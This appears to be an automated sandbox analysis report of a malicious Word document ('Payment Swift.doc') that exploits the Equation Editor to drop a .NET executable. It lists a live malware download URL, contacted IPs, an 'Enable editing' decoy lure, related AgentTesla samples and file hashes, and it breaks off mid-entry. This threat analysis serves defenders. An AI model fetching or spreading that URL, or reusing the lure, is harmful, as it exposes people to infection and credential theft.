                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givennamemicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/countrymicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                          high
                                                                                          http://api.ipify.orgmicrome09255.scr, 00000006.00000002.883885788.000000000237E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/rightzhttp://schemas.xmlsoap.org/ws/2005/05/identity/microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims~http://schemas.xmlsoap.org/ws/2005/05/identitymicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                  high
                                                                                                  https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressuhttp://schemas.xmlsoap.org/ws/200microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                      high
                                                                                                      http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname~http://schemas.xmlsoap.omicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                          high
                                                                                                          https://covid19help.top/microm.scrYEQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionmicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                            high
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdmicrome09255.scr.2.drfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierzhttp://schemas.xmlsomicrome09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.drfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                104.21.83.128
                                                                                                                covid19help.topUnited States
                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                172.67.74.152
                                                                                                                api.ipify.orgUnited States
                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                Analysis ID:1431944
                                                                                                                Start date and time:2024-04-26 03:05:00 +02:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 9m 4s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                Number of analysed new started processes analysed:11
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:Payment Swift.doc
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.expl.evad.winDOC@7/9@2/2
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 66.7%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 97%
                                                                                                                • Number of executed functions: 52
                                                                                                                • Number of non-executed functions: 0
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .doc
                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                • Attach to Office via COM
                                                                                                                • Active ActiveX Object
                                                                                                                • Scroll down
                                                                                                                • Close Viewer
                                                                                                                • Override analysis time to 78551.5447925215 for current running targets taking high CPU consumption
                                                                                                                • Override analysis time to 157103.089585043 for current running targets taking high CPU consumption
                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
                                                                                                                • Execution Graph export aborted for target EQNEDT32.EXE, PID 2452 because there are no executed function
                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                TimeTypeDescription
                                                                                                                03:05:46API Interceptor303x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                03:05:50API Interceptor9292484x Sleep call for process: microme09255.scr modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                104.21.83.128rks18.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                  msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                    BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                      You2bjAMeg.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        PO.docGet hashmaliciousRemcosBrowse
                                                                                                                          r29EHJocKX.rtfGet hashmaliciousUnknownBrowse
                                                                                                                            aaaaaa.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                              APMR1GTlQS.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                JBWI8Xqw4E.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  putin1337-202384344125.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    172.67.74.152Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • api.ipify.org/?format=json
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    covid19help.topRemittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.175.222
                                                                                                                                    Invoice.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.175.222
                                                                                                                                    New Quotation.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.175.222
                                                                                                                                    CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.175.222
                                                                                                                                    rks18.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    You2bjAMeg.docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    Arrival Notice.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.175.222
                                                                                                                                    PO.docGet hashmaliciousRemcosBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    api.ipify.orghttps://lide.alosalca.fun/highbox#joeblow@xyz.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 104.26.13.205
                                                                                                                                    http://asana.wfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    o3KyzpE7F4.ps1Get hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    http://wsj.pmGet hashmaliciousNetSupport RATBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    16770075581.zipGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    Proforma Request.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.26.13.205
                                                                                                                                    Spare part list.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                    • 104.26.12.205
                                                                                                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 104.26.13.205
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    CLOUDFLARENETUShttps://marinatitle.comGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.17.24.14
                                                                                                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                    • 172.67.219.28
                                                                                                                                    https://ndw5xvotehflt.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.53.38
                                                                                                                                    https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 172.66.44.161
                                                                                                                                    https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332Get hashmaliciousPhisherBrowse
                                                                                                                                    • 104.18.26.50
                                                                                                                                    https://bocmyw606y.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 172.66.44.172
                                                                                                                                    https://uporniacomnuvidx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.17.25.14
                                                                                                                                    https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.netGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.21.12.42
                                                                                                                                    https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.21.53.38
                                                                                                                                    https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 172.66.47.90
                                                                                                                                    CLOUDFLARENETUShttps://marinatitle.comGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.17.24.14
                                                                                                                                    ad.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                    • 172.67.219.28
                                                                                                                                    https://ndw5xvotehflt.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.53.38
                                                                                                                                    https://cnmxukx5efilc7lvlel.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 172.66.44.161
                                                                                                                                    https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332Get hashmaliciousPhisherBrowse
                                                                                                                                    • 104.18.26.50
                                                                                                                                    https://bocmyw606y.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                    • 172.66.44.172
                                                                                                                                    https://uporniacomnuvidx.z13.web.core.windows.net/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.17.25.14
                                                                                                                                    https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.netGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.21.12.42
                                                                                                                                    https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.htmlGet hashmaliciousTechSupportScamBrowse
                                                                                                                                    • 104.21.53.38
                                                                                                                                    https://aulixalrrydrea.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                    • 172.66.47.90
                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    7dcce5b76c8b17472d024758970a406bNormal.dotm.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    Database4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    Database4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    iwjvkEAIQa.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    xF3wienia PO2102559-1.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    New Order .docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    Remittance-Advice.docGet hashmaliciousUnknownBrowse
                                                                                                                                    • 104.21.83.128
                                                                                                                                    36f7277af969a6947a61ae0b815907a1gmb.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    New Quotation.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    BANK LETTER.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    NEW GRACE- RFQ .docGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    78YW3Fcvv0.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    Booking copy.xlsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    • 172.67.74.152
                                                                                                                                    No context
                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):857600
                                                                                                                                    Entropy (8bit):7.172009190400047
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:yZ9pzkL1KcPt7sOcflZDLpp8jlMVGdAbNASR8OA10aIkiU:yZ9pzUH7ZEdv8JMVGdGAS210aIki
                                                                                                                                    MD5:75DC78C375DFEE9C0B96FA476BCD5D1C
                                                                                                                                    SHA1:2F61518B7B14B35B9E4FC53C99455C9D2293F139
                                                                                                                                    SHA-256:5EA4437DF5DCC07B35C3959A6FC54D07415D77A659F277FD73F34CCCFBBFE1AD
                                                                                                                                    SHA-512:81673AB01120F7D15675852B4CF3ED020BE1D1BC8494D9DAC213D33324CD22CFE22652FCD85DA06E438C8494FCD19B1E638805651B5412A83AB9912D48015EDB
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2................0..............(... ...@....@.. ....................................@.................................X(..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H...........@ ..............p?..........................................0.1.2.3.4.5.6.7.8.9.....WCF.....Kerberos*.H.........&.(1.....*".......*J.~....t....(6...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(1....*.(.........(7...~....(....o8...o9....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..(=...*..{W...-...}W....
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):16384
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3::
                                                                                                                                    MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60416
                                                                                                                                    Entropy (8bit):3.606068886856527
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:igI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0bfxV:BSyemuSyemuSyemv7rlx
                                                                                                                                    MD5:5CFCC448FC348897F50C4BE101B8DD3F
                                                                                                                                    SHA1:15F0F4307A5F40EB626C1C4AA0A4D007D614FBF3
                                                                                                                                    SHA-256:DCD064EE0E77319C05CEFFAC8A26671154BDF7FB84EAFE7263B8FB32019BCA0D
                                                                                                                                    SHA-512:AB167AE1B8A76A1263C512C6AC20CD5BD63240A511829A3C7A21330FD7A306E531BF938BBA1CDDEC92C0F23EFE540E900418CB9A12ACC48EDEFF25B75A6F0F83
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:0.8.2.7.3.9.7.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1024
                                                                                                                                    Entropy (8bit):0.05390218305374581
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Fri Apr 26 00:05:44 2024, length=139992, window=hide
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1029
                                                                                                                                    Entropy (8bit):4.583397172116236
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:81Ofh3gXg/XAlCPCHaXaTBbTB/Dr8xX+WR3OdcD4icvbGGec4yDtZ3YilMMEpxRL:8AH/XTKT9TxO/3CcXeDe2Dv3qKk7N
                                                                                                                                    MD5:274A778D3EC295F948D2E767D0C1EDC9
                                                                                                                                    SHA1:18A8D36D9D25D86ED80373D972A125DF86E3F89C
                                                                                                                                    SHA-256:C6BA8CFE0F5071CBC7788A1F7E720D8B34F0349A24E9F33B34473EA411E89BF9
                                                                                                                                    SHA-512:4BDB099BF8422AFE4264016982D3918884135955B2C41043CC8CE6739309205F3A7A81B7D38274661677D879BAE7488F3F100E1B5F594F343E592BF37F280ACA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:L..................F.... ......r......r......u...."...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X..*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.."...X.. .PAYMEN~1.DOC..P.......WC..WC.*.........................P.a.y.m.e.n.t. .S.w.i.f.t...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Payment Swift.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .S.w.i.f.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9.W.e8...8.....[D_....3
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:Generic INItialization configuration [folders]
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):60
                                                                                                                                    Entropy (8bit):4.71506101220307
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:M1OeLJNYCm42eLJNYCv:MMeNNoeNN1
                                                                                                                                    MD5:AF72F7B3C76B35416757E998225D56A7
                                                                                                                                    SHA1:3A7C837E7D7E9E9AAFA64FDD33F32DB5883741D5
                                                                                                                                    SHA-256:A77B860B3E3355727944E733DC3214EF5977DEC0BC052C7CF93B1EF473B41A07
                                                                                                                                    SHA-512:0F75C26ADEB0ADDA88E0FDFE5B261D1920B6BCC2ACC9B703125507D0AA4B79681091EFD9CDB23D5CAB2FA5AEC06CBBC88F0C2AD436ACCAD80491A79C6FE6A794
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:[doc]..Payment Swift.LNK=0..[folders]..Payment Swift.LNK=0..
                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):162
                                                                                                                                    Entropy (8bit):2.4797606462020307
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                                                                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                                                                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                                                                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                                                                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):857600
                                                                                                                                    Entropy (8bit):7.172009190400047
                                                                                                                                    Encrypted:false
